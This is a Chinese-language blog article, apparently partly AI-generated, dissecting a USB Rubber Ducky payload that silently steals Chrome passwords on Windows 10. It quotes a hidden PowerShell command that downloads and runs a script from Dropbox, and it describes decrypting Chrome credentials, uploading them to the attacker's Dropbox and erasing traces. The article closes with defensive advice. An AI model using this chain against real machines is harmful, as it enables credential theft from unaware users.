ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

浏览器密码渗出详解:Browser-Passwords-Dropbox-Exfiltration 如何静默窃取 Chrome 密码

浏览器密码渗出详解:Browser-Passwords-Dropbox-Exfiltration 如何静默窃取 Chrome 密码 浏览器密码渗出详解Browser-Passwords-Dropbox-Exfiltration 如何静默窃取 Chrome 密码【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloads在开源项目usbrubberducky-payloadsUSB Rubber Ducky 官方 Payload 仓库中Browser-Passwords-Dropbox-Exfiltration 是浏览器密码渗出方向的经典样本它模拟键盘操作在 Windows 10 上静默启动 PowerShell读取并解密 Chrome 保存的登录凭证把明文密码文件经 Dropbox 回传到攻击者手中最后清理痕迹。本文面向安全新手完整剖析这条渗出链路并给出实用的防御建议。这个 Payload 是什么它位于仓库的 payloads/library/credentials/ 目录下整体信息如下项目说明分类凭证窃取 数据渗出Credentials, Exfiltration目标系统Windows 10 Google Chrome攻击模式HID键盘模拟回传通道Dropbox 云存储作者DIYS.pyVersion 1.0官方 ReadMe.md 把它总结为四个动作编码注入 → 获取 Chrome 凭证 → 保存明文文件 → 清理现场。作者自称它相对隐蔽、执行较快——这正是它值得剖析的原因。工作流程拆解从键盘敲击到数据回传整个攻击分成 4 个阶段前两个阶段由 Ducky 脚本完成后两个由内嵌的 PowerShell 脚本完成。阶段一隐藏 PowerShell 静默启动入口脚本 payload.txt 非常短核心就三步DELAY 3000等待 3 秒等目标系统准备好GUI r模拟Win R打开运行对话框STRINGLN powershell -w h -NoP -NonI -Exec Bypass ...一次性键入启动命令并回车。这条命令的参数值得逐一看懂-w h隐藏窗口——用户看不到任何 PowerShell 弹出-NoP -NonI不加载配置文件、不进入交互模式-Exec Bypass绕过执行策略限制末尾的iwr Dropbox 共享链接?dl1; invoke-expression则从 Dropbox 拉取真正的攻击脚本并立即执行?dl1是强制下载的关键细节脚本注释里专门提醒了这一点。下图展示了 Windows 系统中 PowerShell 的执行策略环境也就是上面-Exec Bypass参数要绕过的对象阶段二读取并解密 Chrome 登录数据真正干脏活的是 Browser-Passwords-Dropbox-Exfiltration.ps1。它的操作顺序是先杀掉 Chrome 进程——避免 SQLite 数据库文件被占用锁定通过 P/Invoke 调用系统自带winsqlite3.dll打开%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data数据库查询logins表中未被用户屏蔽blacklisted_by_user0的条目解密密码密码不是明文存的。旧版 Chrome 用 DPAPI 加密新版改用 AES-GCM密钥藏在Local State的os_crypt.encrypted_key字段——脚本两条解密路径都实现了把网站 用户名 密码拼成一行行明文写入临时目录下的用户名-时间戳_User-Creds.txt悄悄把 Chrome 重新拉起来用户毫无察觉。渗出成功后得到的就是这样一个明文战利品文件阶段三Dropbox 上传回传上传逻辑很直白攻击者事先在自己的脚本里填入Dropbox OAuth Access Token然后调用 Dropbox 的文件上传 REST API把临时目录里的明文凭证文件 POST 到自己的云盘。文件名自带受害者USERNAME和时间戳方便攻击者批量管理多台目标机器。仓库中姊妹 Payload 的接收端演示动图直观展示了渗出数据到达接收方的过程数据实时出现在本地接收服务中阶段四痕迹清理最后一步是打扫战场脚本依次执行清空 Temp 临时文件夹删除注册表中的运行框历史记录RunMRU删除 PowerShell 历史文件清空回收站。做完这一切后脚本exit退出。用户视角里电脑一切如常只是 Chrome 被无感重启了一次。关键文件导读文件作用payload.txt主 Ducky 脚本模拟键盘 隐藏 PowerShell 一行注入Version 01/payload.txt带ATTACKMODE HID声明的变体版本Version 01/Browser-Passwords-Dropbox-Exfiltration.ps1核心脚本杀进程、读库、解密、上传、清痕ReadMe.md使用说明、工作流与已知问题提示Version 01目录中脚本要求攻击者按 Dropbox 开发者指南创建 OAuth 凭证并填入 Token——这也是该 Payload 最大的使用门槛。新手防御指南如何保护自己的浏览器密码理解攻击链路后防御思路就很清晰了按性价比排序启用硬件密钥Passkey/FIDO2登录物理安全密钥无法像数据库密码那样被批量拖走是对抗浏览器凭证渗出最有效的一招收紧 PowerShell 执行策略用Get-ExecutionPolicy检查并收紧本机策略-Exec Bypass在更严格的域策略约束下会失效依赖行为型杀毒软件官方 ReadMe 中明确记录了 AVG 曾拦截该 Payload 对 Chrome 数据的访问——现代杀软的进程行为监控是有效的兜底层定期审查本地凭证目录关注%LOCALAPPDATA%\Google\Chrome\User Data\的异常访问与修改时间不要随意插入来路不明的 USB 设备HID 攻击的前提是物理接触这是所有技术防御之外的第一道关卡。小结Browser-Passwords-Dropbox-Exfiltration 用一个不到 30 行的 Ducky 脚本加一个约百行的 PowerShell 脚本演示了浏览器密码渗出的完整闭环静默注入 → 凭证解密 → 云盘回传 → 痕迹清除。它的价值在于提醒我们只要目标机器上存有明文可解密的浏览器凭证物理接触几分钟就足以让数据飞到攻击者的 Dropbox 里。防护的重心应当放在硬件密钥与系统策略这些让解密和注入都变得困难的环节上。本文内容来自开源学习仓库仅用于安全研究与防御教学请勿对未授权系统实施任何操作。【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloads创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表